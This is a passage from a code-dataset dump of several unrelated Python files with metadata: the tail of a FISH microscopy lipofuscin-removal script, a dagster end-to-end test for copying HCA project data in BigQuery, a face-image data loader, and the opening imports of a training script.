drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\nthresh_scale = 1\n\nthresh = hist_channels.hist_channels(img_dict, pixels_dict, max_per_group= 100000, \n do_bin = True, bin_group = 'Cells', thresh_scale = thresh_scale,\n colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\nim_bin_ndnf = np.zeros(im_diff_ndnf.shape)\nim_bin_sst = np.zeros(im_diff_ndnf.shape)\nim_bin_vip = np.zeros(im_diff_ndnf.shape)\n\nix_ndnf = np.where(im_diff_ndnf > thresh['Ndnf'])\nix_sst = np.where(im_diff_sst > thresh['Sst'])\nix_vip = np.where(im_diff_vip > thresh['Vip'])\n\nim_bin_ndnf[ix_ndnf] = im_diff_ndnf[ix_ndnf]\nim_bin_sst[ix_sst] = im_diff_sst[ix_sst]\nim_bin_vip[ix_vip] = im_diff_vip[ix_vip]\n\n# %% Find mahalanobis distance of pixels from lipofuscin cloud (in binarized images)\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n\norigin_group = 'Lipofuscin'\nbin_group = 'Cells'\n\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n\ntitle = 'Diff gauss sigma = ({0}, {1}); binarized above {2} std from median'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\noutput = m_dist.m_dist(img_dict, pixels_dict, origin_group, bin_group, colors_dict = colors_dict, thresh_scale = 0,\n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\nm_dist_vals = output['m_dist']\nthresh = output['thresh']\n\n# %% Use mahalanobis distance to label all lipofuscin pixels in image (based on threshold)\n\nlipo_pixels = all_cell_pixels[m_dist_vals['Cells'] < thresh, :]\ncell_pixels = all_cell_pixels[m_dist_vals['Cells'] > thresh, :]\n\nim_array_lipo = np.zeros(im_array_gad1.shape)\nim_array_lipo[lipo_pixels[:, 0], lipo_pixels[:, 1], 
lipo_pixels[:, 2]] = np.ones(lipo_pixels.shape[0])\n\nviewer.add_image(data = im_array_lipo, name = 'Detected lipofuscin', colormap = 'gray', blending = 'additive')\n\n\n\n# %% Make scatter plots of images with different filters\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\ntitle = 'Diff gauss sigma = ({0}, {1}); binarized above {2} std from median'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} scatter lipo + cells.png'.format(title)\n#save_file = '{0} scatter cells.png'.format(title)\n\nscatter_channels.scatter_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Make 3D scatter plots of images with different filters\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\n#pixels_dict = {'Lipofuscin': all_lipo_pixels}\n\n\n#colors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n#colors_dict = {'Cells': m_dist_vals['Cells'], 'Lipofuscin': m_dist_vals['Lipofuscin']}\ncolors_dict = {'Cells': np.log(m_dist_vals['Cells']), 'Lipofuscin': 'r'}\n\ntitle = 'Sub-sampled diff gauss sigma = ({0}, {1}) \\n binarized above {2} std from median \\n color = mahalanobis distance from lipofuscin pixels'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\n\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} 3D scatter lipo + cells.png'.format(title)\n#save_file = '{0} 3D scatter cells.png'.format(title)\n\nscatter_channels.scatter_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict,\n make_3D = True,\n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Subtract background\nx = 0\nidx1 = 0\nidx2 = 0\nfor cell in cells:\n data = Cell.cell_data[cell]\n planes = data['z_planes']\n \n for plane in planes:\n xvals = mask_vertices[cell][plane][0]\n idx2 = idx1 + len(xvals)\n cells_ndnf[idx1:idx2] = cells_ndnf[idx1:idx2] - avg_bg_ndnf[x]\n cells_sst[idx1:idx2] = cells_sst[idx1:idx2] - avg_bg_sst[x]\n cells_vip[idx1:idx2] = cells_vip[idx1:idx2] - avg_bg_vip[x]\n idx1 = idx2 \n\n x += 1\n \n\n\n", "repo_name": "amrita112/FISH-Image-Analysis", "sub_path": "old/Lipofuscin_removal.py", "file_name": "Lipofuscin_removal.py", "file_ext": "py", "file_size_in_byte": 15444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "IPython.get_ipython", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, 
{"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 54, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 59, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 71, "usage_type": "call"}, {"api_name": "napari.Viewer", "line_number": 84, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 96, "usage_type": "call"}, {"api_name": "Cell.cell_data.keys", "line_number": 97, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 98, "usage_type": "call"}, {"api_name": "Cell.cell_data_temp", "line_number": 100, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 104, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 106, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 107, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 109, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 110, "usage_type": "attribute"}, {"api_name": "Cell.cell_data.keys", "line_number": 119, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 121, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 123, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 126, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 135, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, "usage_type": "call"}, {"api_name": 
"pickle.load", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 172, "usage_type": "call"}, {"api_name": "pixels_in_roi.pixels_in_roi", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 184, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 196, "usage_type": "argument"}, {"api_name": "pickle.load", "line_number": 197, "usage_type": "call"}, {"api_name": "pixels_in_roi.pixels_in_roi", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 207, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 208, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 212, "usage_type": "call"}, {"api_name": "time.time", "line_number": 225, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 229, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 233, "usage_type": "call"}, {"api_name": "time.time", "line_number": 234, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "hist_channels.hist_channels", "line_number": 261, "usage_type": "call"}, {"api_name": "hist_channels.hist_channels", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 297, "usage_type": "call"}, {"api_name": "m_dist.m_dist", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 334, "usage_type": "call"}, {"api_name": "scatter_channels.scatter_channels", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 374, "usage_type": "call"}, {"api_name": "scatter_channels.scatter_channels", "line_number": 383, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 395, "usage_type": "attribute"}]} +{"seq_id": "14546025649", "text": "import logging\n\nimport pytest\nfrom dagster import (\n PipelineExecutionResult,\n ResourceDefinition,\n execute_pipeline,\n in_process_executor,\n)\nfrom dagster_gcp.gcs import gcs_pickle_io_manager\nfrom dagster_utils.contrib.data_repo.jobs import poll_job\nfrom dagster_utils.resources.data_repo.jade_data_repo import jade_data_repo_client\nfrom dagster_utils.resources.google_storage import google_storage_client\nfrom dagster_utils.resources.sam import sam_client\nfrom dagster_utils.resources.slack import console_slack_client\nfrom data_repo_client import RepositoryApi\nfrom 
google.cloud.bigquery import Client\n\n# isort: split\n\nfrom hca_orchestration.config import preconfigure_resource_for_mode\nfrom hca_orchestration.pipelines.cut_snapshot import cut_snapshot\nfrom hca_orchestration.repositories.local_repository import (\n copy_project_to_new_dataset_job,\n load_hca_job,\n)\nfrom hca_orchestration.resources.config.dagit import dagit_config\nfrom hca_orchestration.resources.config.data_repo import (\n SnapshotCreationConfig,\n hca_manage_config,\n)\nfrom hca_orchestration.resources.data_repo_service import data_repo_service\nfrom hca_orchestration.tests.e2e.conftest import DatasetInfo\nfrom hca_orchestration.tests.support.bigquery import (\n assert_data_loaded,\n assert_metadata_loaded,\n exec_query,\n query_metadata_table,\n)\n\n\n@pytest.fixture\ndef snapshot(monkeypatch, hca_project_id, load_hca_run_config,\n dataset_info: DatasetInfo, data_repo_client: RepositoryApi):\n monkeypatch.setenv(\"ENV\", \"dev\")\n\n load_job = load_hca_job()\n execute_pipeline(\n load_job,\n run_config=load_hca_run_config\n )\n\n snapshot_config = {\n \"resources\": {\n \"snapshot_config\": {\n \"config\": {\n \"managed_access\": False,\n \"qualifier\": None\n }\n },\n },\n \"solids\": {\n \"submit_snapshot_job\": {\n \"config\": {\n # we are using a snapshot name for testing that\n # will not pass our validation regex\n \"validate_snapshot_name\": False\n }\n },\n \"add_steward\": {\n \"config\": {\n \"snapshot_steward\": \"monster-dev@dev.test.firecloud.org\"\n }\n }\n }\n }\n creation_config = SnapshotCreationConfig(\n dataset_info.dataset_name,\n f\"{dataset_info.dataset_name}_snapshot_test\",\n \"\",\n False\n )\n snapshot_job = cut_snapshot.to_job(\n resource_defs={\n \"data_repo_client\": preconfigure_resource_for_mode(jade_data_repo_client, \"dev\"),\n \"data_repo_service\": data_repo_service,\n \"gcs\": google_storage_client,\n \"hca_manage_config\": preconfigure_resource_for_mode(hca_manage_config, \"dev\"),\n \"io_manager\": preconfigure_resource_for_mode(gcs_pickle_io_manager, \"dev\"),\n \"sam_client\": preconfigure_resource_for_mode(sam_client, \"dev\"),\n \"slack\": console_slack_client,\n \"snapshot_config\": ResourceDefinition.hardcoded_resource(creation_config),\n \"dagit_config\": preconfigure_resource_for_mode(dagit_config, \"dev\"),\n },\n executor_def=in_process_executor\n )\n\n snapshot_job_result = execute_pipeline(snapshot_job, run_config=snapshot_config)\n snapshot_info = snapshot_job_result.result_for_solid(\n \"get_completed_snapshot_info\").materializations_during_compute[0]\n\n yield snapshot_info\n\n # clean up the snapshot when finished\n logging.info(\n f\"Deleting snapshot, name = {snapshot_info.tags['snapshot_name']}, id = {snapshot_info.tags['snapshot_id']}\")\n response = data_repo_client.delete_snapshot(id=snapshot_info.tags[\"snapshot_id\"])\n poll_job(response.id, 300, 2, data_repo_client)\n\n\n@pytest.fixture\ndef copied_dataset(snapshot, copy_project_config, hca_project_id: str, data_repo_client: RepositoryApi):\n base_copy_project_config = copy_project_config.copy()\n base_copy_project_config[\"resources\"][\"hca_project_copying_config\"] = {\n \"config\": {\n \"source_bigquery_project_id\": snapshot.tags['data_project'],\n \"source_bigquery_region\": \"US\",\n \"source_snapshot_name\": snapshot.tags['snapshot_name']\n }\n }\n base_copy_project_config[\"resources\"][\"hca_project_id\"] = {\n \"config\": {\n \"hca_project_id\": hca_project_id,\n }\n }\n copy_project_job = copy_project_to_new_dataset_job(\"dev\", \"dev\")\n result: 
PipelineExecutionResult = execute_pipeline(\n copy_project_job,\n run_config=base_copy_project_config\n )\n copied_dataset = result.result_for_solid(\"validate_copied_dataset\").materializations_during_compute[0]\n\n yield copied_dataset\n\n # clean up the copied dataset when finished\n logging.info(f\"Deleting copied dataset, id = {copied_dataset.tags['dataset_id']}\")\n response = data_repo_client.delete_dataset(id=copied_dataset.tags[\"dataset_id\"])\n poll_job(response.id, 600, 2, data_repo_client)\n\n\n@pytest.mark.e2e\ndef test_copy_project(hca_project_id, copied_dataset, tdr_bigquery_client: Client): # (copied_dataset,\n copied_dataset_bq_project = copied_dataset.tags['project_id']\n copied_dataset_name = copied_dataset.tags['dataset_name']\n\n assert_metadata_loaded(\"links\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"analysis_file\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"analysis_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"cell_suspension\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"collection_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"donor_organism\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"enrichment_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\n \"library_preparation_protocol\",\n copied_dataset_name,\n copied_dataset_bq_project,\n tdr_bigquery_client)\n assert_metadata_loaded(\"process\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"project\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\n \"specimen_from_organism\",\n copied_dataset_name,\n copied_dataset_bq_project,\n tdr_bigquery_client)\n assert_data_loaded(\"analysis_file\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n\n assert_single_project_loaded(hca_project_id, copied_dataset_name, copied_dataset_bq_project,\n tdr_bigquery_client)\n\n\ndef assert_single_project_loaded(project_id: str, dataset_name: str, bq_project: str, client: Client):\n query = f\"\"\"\n SELECT * FROM `datarepo_{dataset_name}.project` WHERE project_id = '{project_id}'\n \"\"\"\n\n entity_loaded = exec_query(query, client, bq_project)\n assert len(entity_loaded) == 1, f\"Should have loaded project with id {project_id}\"\n\n total_rows_loaded = query_metadata_table(\"project\", dataset_name, bq_project, client)\n assert len(total_rows_loaded) == 1, f\"Should have 1 row in project table, found {len(total_rows_loaded)}\"\n\n links_rows = query_metadata_table(\"links\", dataset_name, bq_project, client)\n for row in links_rows:\n assert row[\"project_id\"] == project_id, \\\n f\"Should only have rows for project_id {project_id} in links table,\"\\\n f\"found row for project_id {row['project_id']}\"\n", "repo_name": "DataBiosphere/hca-ingest", "sub_path": "orchestration/hca_orchestration/tests/e2e/test_copy_project.py", "file_name": "test_copy_project.py", "file_ext": "py", "file_size_in_byte": 7816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hca_orchestration.tests.e2e.conftest.DatasetInfo", "line_number": 44, "usage_type": "name"}, 
{"api_name": "data_repo_client.RepositoryApi", "line_number": 44, "usage_type": "name"}, {"api_name": "hca_orchestration.repositories.local_repository.load_hca_job", "line_number": 47, "usage_type": "call"}, {"api_name": "dagster.execute_pipeline", "line_number": 48, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.data_repo.SnapshotCreationConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "hca_orchestration.pipelines.cut_snapshot.cut_snapshot.to_job", "line_number": 83, "usage_type": "call"}, {"api_name": "hca_orchestration.pipelines.cut_snapshot.cut_snapshot", "line_number": 83, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster_utils.resources.data_repo.jade_data_repo.jade_data_repo_client", "line_number": 85, "usage_type": "argument"}, {"api_name": "hca_orchestration.resources.data_repo_service.data_repo_service", "line_number": 86, "usage_type": "name"}, {"api_name": "dagster_utils.resources.google_storage.google_storage_client", "line_number": 87, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 88, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.data_repo.hca_manage_config", "line_number": 88, "usage_type": "argument"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 89, "usage_type": "call"}, {"api_name": "dagster_gcp.gcs.gcs_pickle_io_manager", "line_number": 89, "usage_type": "argument"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 90, "usage_type": "call"}, {"api_name": "dagster_utils.resources.sam.sam_client", "line_number": 90, "usage_type": "argument"}, {"api_name": "dagster_utils.resources.slack.console_slack_client", "line_number": 91, "usage_type": "name"}, {"api_name": "dagster.ResourceDefinition.hardcoded_resource", "line_number": 92, "usage_type": "call"}, {"api_name": "dagster.ResourceDefinition", "line_number": 92, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 93, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.dagit.dagit_config", "line_number": 93, "usage_type": "argument"}, {"api_name": "dagster.in_process_executor", "line_number": 95, "usage_type": "name"}, {"api_name": "dagster.execute_pipeline", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 105, "usage_type": "call"}, {"api_name": "data_repo_client.delete_snapshot", "line_number": 107, "usage_type": "call"}, {"api_name": "dagster_utils.contrib.data_repo.jobs.poll_job", "line_number": 108, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "data_repo_client.RepositoryApi", "line_number": 112, "usage_type": "name"}, {"api_name": "hca_orchestration.repositories.local_repository.copy_project_to_new_dataset_job", "line_number": 126, "usage_type": "call"}, {"api_name": "dagster.PipelineExecutionResult", "line_number": 127, "usage_type": "name"}, {"api_name": "dagster.execute_pipeline", "line_number": 127, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 136, "usage_type": "call"}, {"api_name": "data_repo_client.delete_dataset", "line_number": 137, "usage_type": "call"}, {"api_name": "dagster_utils.contrib.data_repo.jobs.poll_job", "line_number": 138, "usage_type": "call"}, {"api_name": "pytest.fixture", 
"line_number": 111, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 142, "usage_type": "name"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 146, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 147, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 148, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 149, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 150, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 151, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 152, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 153, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 158, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 159, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 160, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_data_loaded", "line_number": 165, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 141, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 171, "usage_type": "name"}, {"api_name": "hca_orchestration.tests.support.bigquery.exec_query", "line_number": 176, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.query_metadata_table", "line_number": 179, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.query_metadata_table", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "29309915885", "text": "import os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nplt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\n\nfrom nn import *\n\ndef load_data():\n\n\ttrain_x_pos_path = 'data/training/pos'\n\ttrain_x_neg_path = 'data/training/neg'\n\n\ttest_x_pos_path = 'data/testing/pos'\n\ttest_x_neg_path = 'data/testing/neg'\n\n\ttrain_x_pos = read_images(train_x_pos_path)\n\ttrain_x_neg = read_images(train_x_neg_path)\n\n\ttrain_y_pos = [1 for i in range(len(train_x_pos))]\n\ttrain_y_neg = [0 for i in range(len(train_x_neg))]\n\n\ttrain_x = np.array(train_x_pos + train_x_neg)\n\ttrain_y = np.array(train_y_pos + train_y_neg)\n\n\ttest_x_pos = read_images(test_x_pos_path)\n\ttest_x_neg = read_images(test_x_neg_path)\n\n\ttest_y_pos = [1 for i in range(len(test_x_pos))]\n\ttest_y_neg = [0 for i in range(len(test_x_neg))]\n\n\ttest_x = np.array(test_x_pos + test_x_neg)\n\ttest_y = np.array(test_y_pos + test_y_neg)\n\n\tclasses = np.array(['non-face', 'face'])\n\n\ttrain_y = np.reshape(train_y, (1, len(train_y)))\n\ttest_y = np.reshape(test_y, (1, len(test_y)))\n\n\treturn train_x, train_y, test_x, test_y, classes\n\n\ndef read_images(path):\n\n\tres = []\n\tfor file in os.listdir(path):\n\n\t\ttry:\n\t\t\timg = cv2.imread(os.path.join(path, file), 
cv2.IMREAD_GRAYSCALE)\n\t\t\tres.append(img.copy())\n\t\texcept:\n\t\t\tcontinue\n\n\treturn res\n\n\ndef preprocessing(train_x_orig, train_y, test_x_orig, test_y, classes=None):\n\n\t# train_x_orig, train_y, test_x_orig, test_y, classes = load_data()\n\n\t# print train_x_orig.shape\n\n\n\tm_train = train_x_orig.shape[0]\n\tm_test = test_x_orig.shape[0]\n\n\tnum_px = train_x_orig.shape[1]\n\n\tprint (\"Number of training examples: \" + str(m_train))\n\tprint (\"Number of testing examples: \" + str(m_test))\n\tprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\n\tprint (\"train_x_orig shape: \" + str(train_x_orig.shape))\n\tprint (\"train_y shape: \" + str(train_y.shape))\n\tprint (\"test_x_orig shape: \" + str(test_x_orig.shape))\n\tprint (\"test_y shape: \" + str(test_y.shape))\n\n\t# reshape and standardize the images before feeding to the network\n\n\ttrain_x_flatten = train_x_orig.reshape(train_x_orig.shape[0], -1).T # The \"-1\" makes reshape flatten the remaining dimensions\n\ttest_x_flatten = test_x_orig.reshape(test_x_orig.shape[0], -1).T\n\n\t# Standardize data to have feature values between 0 and 1.\n\ttrain_x = train_x_flatten/255.\n\ttest_x = test_x_flatten/255.\n\n\tprint (\"train_x's shape: \" + str(train_x.shape))\n\tprint (\"test_x's shape: \" + str(test_x.shape))\n\n\treturn train_x, train_y, test_x, test_y", "repo_name": "kylin-zhuo/AI-Expert", "sub_path": "DeepLearning/nn/load.py", "file_name": "load.py", "file_ext": "py", "file_size_in_byte": 2593, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 6, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 6, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 42, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 53, "usage_type": "attribute"}]} +{"seq_id": "15571340759", "text": "import os, sys, random, copy, time\nimport torch\nimport argparse\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom torchvision import transforms\nfrom torchvision import models\nimport torchvision.datasets as dset\n\nfrom utils.utils import get_model_path, print_log, manipulate_net_architecture\nfrom utils.utils import convert_secs2time, time_string\nfrom utils.training import adjust_learning_rate, train_model, validate, save_checkpoint\nfrom 